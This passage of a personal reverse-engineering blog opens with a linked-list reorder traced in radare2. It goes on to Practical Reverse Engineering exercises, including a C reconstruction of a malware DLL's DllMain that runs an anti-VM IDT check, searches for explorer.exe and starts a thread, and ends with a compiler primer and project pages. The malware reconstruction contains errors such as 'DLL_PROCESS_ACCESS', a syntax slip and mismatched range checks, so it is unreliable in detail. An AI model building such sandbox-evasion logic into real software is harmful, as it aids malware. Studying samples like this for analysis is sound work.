            printf("%d ", i);
        }

        ReorderList(li.GetHead());

        putchar(10);
        auto c = li.Pop();
        while (c != -1) {
            printf("%d ", c);
            c = li.Pop();
        }
        putchar(10);
    }

Reverse engineering the solution

Now its time to see how the solution code looks like in assembly :).

oh look at those cute little variable name that radare has analyzed for us. Same as the ones that we used in our code right?. Well i compiled it with -g flag this time hehe :3

Anyway, in above stub, we set f and l with head (rdi) and jump to 0x1216.

this is just a simple comparison, the stub compares l with 0 and jumps to 0x1235 if comparison yeilds zero.

else we jump to below stub

there we call l->GetNext() and check if the return value is null. if it is null, it jumps to 0x1235. else, to 0x122e.

both of above snippets does nothing but jump to 0x123a. Oh, 0x122e set eax to 1.

In 0x123a, there is a test al, al instruction which checks if any of the above comparisons leads to a null, which means if l == null or l->GetNext() == null.

if not, a jump will not be taken and execution will continue to 0x11ee.

0x11ee calls f->GetNext() (0x11ee - 0x11f5) and stores resulting value at f. So it basically does f = f->GetNext().

then at address 0x11fe, we can see l is copied to rax, which is then passed to GetNext() method as this parameter. return value GetNext() is then passed as this parameter to the GetNext method and l is assigned with the return value. So the whole thing can be represented as l = l->GetNext()->GetNext(). then it continues to loop until l or l->GetNext() is nullptr.

if any of above comparisons become null, loop ends and jump at 0x123c wont be taken. node is assigned with f->GetNext() (0x123e - 0x124a). then rsi is loaded with 0 (or null). Then rdi is assigned with rax, which is f. then there is a call to SetNext(). So the function may look like this in C. f->SetNext(NULL). Then we can see prev is assigned with 0 following a jump to 0x129c.

instruction at address 0x129c check whether node is null. if it is not, jump is taken to 0x1269. first 4 lines call node->GetNext() and save return value in var_8. then node’s next is set to prev. remember? which is intially null (0x1279 - 0x1287). And from 0x128c to 0x1298, it simply sets prev to node and var_8 (node->GetNext()) to node.

the loop continues until node == null.

When the termination condition is met, rip will get to 0x12a3, where it assignes start with head and prev with end.

then there is this series of comparisons. first one compares start with 0 and the next one compares end with 0. And if any of them is 0 (or null), it jumps to 0x1319 and exits.

from address 0x12b5 to 0x12c1, what the code does is it simply gets next node of the start and move it to nnode. from 0x12c5 to 0x12d3, code sets start’s next node to end using start->SetNext(end).

next, rdi is loaded with end and passed to GetNext() method and the return value is stored in ennode. In the next few lines, nnode and end are loaded into rsi and rdi. then they are passed down to SetNext() method, which may look like this end->SetNext(nnode). then we can see start is assigned with nnode and end is assigned with ennode and continue to loop until termination condition is met, start == nullptr || end == nullptr

and yeap that’s it. First it saves next nodes of the start and the end in two locals named nnode and ennode. then Start node’s next is set to end and its next is set to nnode (prev next node of the start). Then start and end are set to nnode and ennode to continue the loop :).

loop:
    if start == null or end == null:
        return
    nnode   <--- save start->GetNext()
    ennode  <--- save end->GetNext()
    set start->next = end
    set end->next   = nnode
    set start = nnode
    set end   = ennode
    jump loop

Oh my freaking god i spent two days writing this damned article. I guess that is it. I hope yall understood what i did here :3

#Spread Anarchy!

sample_j DllMain

Sat, 02 Oct 2021 00:40:06 +0000

So last time we finished some exercises from the book pratical reverse engineering. Now, we have page 35 exercises. I wont cover exercise here because some are really straight forward.

without useless intros lets get started.

Chaper 1, page 35

We are starting with the second one, because first one is pretty easy. 2nd question asks us to decompile DllMain.

as we can see, IDA has generated us some information of the stack as well as a nice graph view. From that, we can decompile it down to,

   BOOL __stdcall APIENTRY DllMain(HMODULE *hModule, 
                           DWORD ul_reason_for_call, 
                           LPVOID lpReserved)
   {
      IDTR idtr;
      PROCESSENTRY32 pe;
      HANDLE handle;
   }

next we can the function prologue, where stack frame is initialized. using sub esp, 130h instruction, we can confirm that stack will be 0x130 bytes large. next we can see a sidt fword[ebp+idtr].

if you have some low level debugging/development experience, you might know what sidt does. in case you dont, it reads idtr register to the operand location. in this case, fword[ebp+idr]will be filled with idtr register. So whats this idtr register? well, idtr register is a 6byte sized register. it stores length of the interrupt desciptor table in the last 2 bytes and base of interrupt desciptor table in the top 4 bytes. Now, how can we call sidt from C/C++?

before that, here we build the idtr structure

   typedef struct idtr {
      DWORD idt_base;
      short idt_size;
   } IDTR, *PIDTR;

inside DllMain we do this.

   IDTR idtr;
   __sidt(&idtr);

then DllMain compares idtr+2 with some 2 random hex values that looks like memory addresses. Using the above explaination, it is pretty clear that whoever wrote this malware compares base address of interrupt desciptor table with 2 hardcoded memory addresses, first as we can see in the above image, 0x8003f400 and 0x80047400 in the below image. Tbh, this is bad. Reason is that, in multi core processors each core gets a different base address for interrupt desciptor table. And when using hardcoded addresses… Anyway. lets decompile that part too.

   if (idtr.idt_base > 0x8003f400 && idtr.idt_base < 0x80047400){
      return FALSE;
   }

From above snippet it is clear that it does check for some range. looks like it validates IDT base…

After the comparision if the range requirements are satisfied, we can see that DllMain creates a snapshot of all the running processes.

we can decompile that stub into

   handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
   if (handle == INVALID_HANDLE_VALUE) {
      return FALSE;
   }

it also zero out pe using stosd instruction.

   memset(&pe.cntUsage, 0, 0x49);

Next, DllMain calls Process32First with arguements &pe(eax) and handle(edi), a string comparison with explorer.exe and then if comparison fails, we can see a call to Process32Next. Basically this stub go through each process of the snapshot until it finds explorer.exe.

decompiled version of that stub may look like

   pe.dwSize = sizeof(PROCESSENTRY32);
   if (Process32First(handle, &pe) != 0) {
      // code here
   }
   else {
      while (Process32Next(handle, &pe) != 0) {
         if (wcscmp(pe.szExeFile, L"explorer.exe") == 0) {
            // code here
         }
         continue;
      }
      return FALSE;
   }

Once it found the explorer.exe, it compares the process’s pid to it’s parents pid.

here if they are equal, we simply exit out.

else, we create a thread in the current virtual memory space with start address set to 0x100032d0.

   do_evil_stuff:
      if (pe.th32ParentProcessID == pe.th32ProcessID) {
         return FALSE;
      }
      else {
         if (ul_reason_for_call == DLL_PROCESS_ACCESS) {
            CreateThread(
               NULL, NULL, (LPTHREAD_START_ROUTINE)0x100032d0, NULL, NULL, NULL
            );
            return TRUE;
         }
         return TRUE:
      }

with that info, we can fill out the stub that searches for explorer.exe like this

   pe.dwSize = sizeof(PROCESSENTRY32);
   if (Process32First(handle, &pe) != 0) {
      if (wcscmp(pe.szExeFile, L"explorer.exe") == 0)
         goto do_evil_stuff;
      else {
         while (Process32Next(handle, &pe) != 0) {
            if (wcscmp(pe.szExeFile, L"explorer.exe") == 0) {
               goto do_evil_stuff;
            }
            continue;
         }
         return FALSE;
      }
   }

combining all into a single stub, we will get something like this as the DllMain

   typedef struct idtr {
      DWORD idt_base;
      short idt_size;
   } IDTR, *PIDTR;

   BOOL __stdcall APIENTRY DllMain(HMODULE *hModule, 
                           DWORD ul_reason_for_call, 
                           LPVOID lpReserved)
   {
      IDTR idtr;
      PROCESSENTRY32 pe;
      HANDLE handle;

      __sidt(&idtr);
      if (idtr.idt_base < 0x80047400 && idtr.idt_base > 0x8003f400){
         return FALSE;
      }

      handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
      if (handle == INVALID_HANDLE_VALUE) {
         return FALSE;
      }
      memset(&pe.cntUsage, 0, 0x49);
      pe.dwSize = sizeof(PROCESSENTRY32);
      if (Process32First(handle, &pe) != 0) {
         if (wcscmp(pe.szExeFile, L"explorer.exe") == 0)
            goto do_evil_stuff;
         else {
            while (Process32Next(handle, &pe) != 0) {
               if (wcscmp(pe.szExeFile, L"explorer.exe") == 0) {
                  goto do_evil_stuff;
               }
               continue;
            }
            return FALSE;
         }
      }

   do_evil_stuff:
      if (pe.th32ParentProcessID == pe.th32ProcessID) {
         return FALSE;
      }
      else {
         if (ul_reason_for_call == DLL_PROCESS_ACCESS) {
            CreateThread(
               NULL, NULL, (LPTHREAD_START_ROUTINE)0x100032d0, NULL, NULL, NULL
            );
            return TRUE;
         }
         return TRUE:
      }
   }

#Spread Anarchy!

Practical Reverse Engineering writeup

Wed, 29 Sep 2021 09:46:25 +0000

Introduction

Hello, rxOred here, with another badly written write-up.

A years ago, i started reading practical reverse engineering book. Eventhough I was familiar with most of those concepts, that book’s exercises were pretty challenging. Aand guess what, there were no solutions to those Exercises in the book. Authors have encouraged RE community to share solutions with others using their blogs, r/reverse-egnineering etc.

At that time, i never really wanted to create a blog. however while doing those challenges, i have wrote some, not-very-detailed explainations. So, i will be sharing those stuff with yall. This 2 part series post will provide some solutions for Exercises in chapter 1, which is about x86.

Chapter 1, page 11

4 bytes (32 bits). makes sense right? if you have read the whole snippet, line 5 is a, repne scasb intel indentifies these instructions as string operation instructions. which is perfectly fine.About scasb, scasb/scasw/scasd instructions compare al/ax/eax with value at memory address specified in edi. rep is a prefix. it is used for repeating same thing. So the what the whole instruction does is, it compares al (because scas’b’) with whatever value at memory address specified in edi while increasing edi by 1 until the byte is found in the buffer or ecx == 0. so as for our answer, it is 4 bytes because since edi is an memory address, memory addresses in x86 takes upto 4bytes :)
1 byte rep stosb this instruction is used to initialize a buffer with some value (like memset). edi should contain the address of buffer, and since its a stos’b’, which is the indication of byte, al contain the value that the buffer should be assigned with. So from that, it is clear that ebp+c, second argument to the function is sizeof byte:)
What the snippet does is pretty simple, in line 1, edi is assigned with ebp+8 (first arg), which we concluded as a memory address. next line, we can see that its saving that address in edx followed by a xor eax, eax, which clears out eax register. In line 4, ecx is ored(did i spell that correct?) with 0xffffffff. result of this operation is, well, 0xffffffff because anything | 1 results in a 1.

then we have what we discussed in 1), repe scasb. I won’t explain it again ew.

So next we have some add ecx, 2, which, as anyone can guess, adds 2 to ecx. Followed by a negation. then we have a mov al, ebp+c, which moves our byte into al register. then edi is assigned with edx, where we saved our edi before. Then we have what we discussed in 2).

So what this basically does is, it compares 0 with whatever at memory address edi until 0 is found in the buffer while decrementing ecx. then we set ecx + 2, then we negate it to get the string len, then we write [ebp-c] to [edi] byte by byte :3

Chapter 1, page 17

So, in this exercise we want to write a program that reads instruction pointer :3. here we go

   ; here we are reading address of the instruction after the call instruction.
   readeip: call     lbl         ; call lbl, this pushes address of next instruction to the stack
            mov      ebx, 0
            mov      eax, 0
            int      0x80        ; exit

   lbl:     mov      eax, [esp]  ; we read value at esp to eax. which is the return address.
            ret

Next we have to set eip to 0xAABBCCDD

   ; 1. here we when we call, return address is pushed to stack
   writeeip:   call  write
               mov   ebx,  0
               mov   eax,  0
               int   0x80

   ; 2. we then modify the value at stack to 0xAABBCCDD
   write:      mov   [esp], 0xAABBCCDD
               ret   ; cause a segfault

   writeeip:   call  write

   ; remember, ret just pops whatever at esp to eip
   write:      push  0xAABBCCDD
               ret

   writeeip: jmp  0xAABBCCDD
   ;yeaup simple as that

   writeeip: mov     eax, 0xAABBCCDD
             call    eax
   ; this is bit important. lot of malware authors use this method to access win32 APIs

same thing that happened to many of above snippets ?. it will crash with a seg fault. The reason is that, we are returning to a totally unknown address. In this case we havent pushed anything to the stack other than return address and base pointer of the prev stack frame. and when ret pops the value from stack to eip, and what we get is base of the previous stack frame. Guess what? stack is non-executable :3
```
  --------------------------
           eax (y)
  --------------------------
           ecx (x)
  --------------------------
        (return addr)
  --------------------------
             ebp             <------- esp
  --------------------------
```
edx:eax will be used.

In the next article, we will go through the last exercise

#Spread Anarchy!

Compilers 101

Tue, 28 Sep 2021 22:58:02 +0000

Compilers

This article is all about compilers.

For many people, a compiler is a mystery. for them, it is like a magical black box that takes the source file as an input and generates a binary file that can be executed.

However, the truth to be told, compilers are not wizards. In this article, we will start from the introduction to the front-end of a compiler from a reverse-engineering perspective.

The next articles will contain detailed explanations of the optimizer and the back-end.

What is a compiler and how does it affect the reverse engineering process.

A compiler is a very complex piece of software, and what it essentially does is, taking one representation of a program as an input and generating a representation of the same program.

This input representation is usually the text file containing the source code that complies with the specifications of a specific high-level language. And the

Output is usually a low-level language representation of the same program.

Sounds not that complex right? Well, this is just a high-level overview. During this process of translation between different representations, the input source will have to face many algorithms, techniques employed by the compiler to optimize the low-level representation it generates. These algorithms may add more levels of complexity on top of the original code.

And may even contain code that the developer is not intended of writing. These things make it harder for someone to read the compiler-generated code.

Compiler architecture.

Compiler architecture mainly consists of 3 things

- Front end
- Optimizer
- Back end

I this first article, let’s dive into the Front end.

The front end.

tbh, the front is the least important out of the above 3 in a reverse engineering perspective. anyway…

So what does this thing do? well, the front end is the place where the process of compilation begins.

Lexical analysis

Lexical analyzer is a part of the compiler front end and is responsible for tokenizing the given source file. What this means is that, when given a stream of characters, a lexical analyzer can turn that stream of characters into a set of distinct lexemes. These lexemes can

be separated by some delimiter. A token can have many lexemes, which essentially means that a token is a category of lexemes if that makes sense.

for example, following statement

if ( i == 0 )

can be broken down into

lexemes	token
if	condition
(	bracket_open
i	indetifier
==	equal_sign
0	integer
)	bracket_end

Tokenizing is very similar to how we break down complex sentences in natural languages. just like how a sentence is divided into different parts.

But unlike humans, to achieve this task, lexical analyzers use pattern matching algorithms and regular expressions.

It’s also worth mentioning that lexical analysis or tokenizing can be done using unix utilities like FLEX and ANTLR.

Syntax analysis

Syntax analysis is the second phase of the compiler’s front end. Unlike lexical analysis, where pattern matching algorithms and regular expressions are used to identify tokens, Syntax analysis use a

concept known as Context-Free Grammar (CFGs). Context-Free Grammar is kinda similar to regular grammar but it’s mainly used to describe the syntax of programming languages. basically, it’s a superset of regular grammar.

When the lexical analyzer outputs the stream of tokens, these tokens are then fed into the syntax analyzer. Then the syntax analyzer analyzes and parses the stream of tokens against different rules and

detect syntax errors in the code.

for example, if ( i == 0 is passed down, it is the syntax analyzers job to report it as an error. However, some syntax analyzers are capable of continuing the parsing process even if there are syntax errors. To achieve

this, syntax analyzers use error recovery strategies.

After parsing all the syntax, the syntax analyzer should generate a parse tree. A parse tree is a representation of the production rules.

for example, applying left-derivation production rule on x + b - c, resulting parse tree is

E -> E - E

E -> E + E - E

E -> id + E - E

E -> id + id - id



        E
    ---------
    |   |   |
    E   -   E
____|____
|   |   |
E   +   E

Syntax analysis can be done using YACC(Yet Another Compiler Compiler), CUP, Bison, and ANTLR.

Abstract Synstax Trees (ASTs)

Just like a parse tree, an abstract syntax tree or AST is a graph representation of the source code. How an AST differs from a parse tree is, an AST is a simplified version of the parse tree. And in ASTs operators are internal nodes. ASTs are also considered to be the out of syntax analysis phase of a compiler.

Remember CFGs?, in modern programming languages, there are lots of things that CFGs cant express. for example type definitions. Almost every modern language allows new types. However, CFGs cannot represent new types and

their usage. ASTs can solve these problems.

Another major usage of ASTs is that a full traversal of the AST data structure represents the correctness of the program. ASTs are heavily used in semantic analysis too.

So yeah that’s it for the compiler front end. I suggest readers go through “Concepts of programming languages” for more detailed explanations.

I’ll do the optimization article soon.

#Spread Anarchy!

Some of rxOred's cool projects :3

Tue, 28 Sep 2021 22:10:39 +0000

chip8

chip-8 emulator written in rust.

zkz

Linux x64 debugger written in C++.

zkinject

C++17 library to instrument elf binaries and Linux processes.

pyzkinject

python bindings for zkinject!

unnatural

Unnatural is Go program that detects infected elf binaries.

spidyBOT

A small web information gathering tool written in python.

BShell

A useless Linux shell written in C.

elfparse

elfparse is a x64 elf binary parser/parser library written in C.

About rxOred

Tue, 28 Sep 2021 16:21:05 +0000

rxOred’s real name is Jayod, a 17 year-old, self taught programmer / reverse engineer from Hell.

Spread Anarchy!

Contact me

rxored@gmail.com
github
twitter
Spotify
Discord rxOred#2655

Hello!

Tue, 28 Sep 2021 16:21:05 +0000

Tbh, I don’t really know what to write here. A few years ago, when I started out programming, I never thought of or wanted to start blogging. Hell, I never wanted to get into security back then. But things change!.

Here I am, editing the first blog post :)

Anyway, about this blog. Here I will be posting my projects, research, guides, and other useless information on programming, system security, and reverse engineering. I’m also looking forward to start posting malware analysis reports and CTF writeups.

So, I think that’s it :3

#spread anarchy!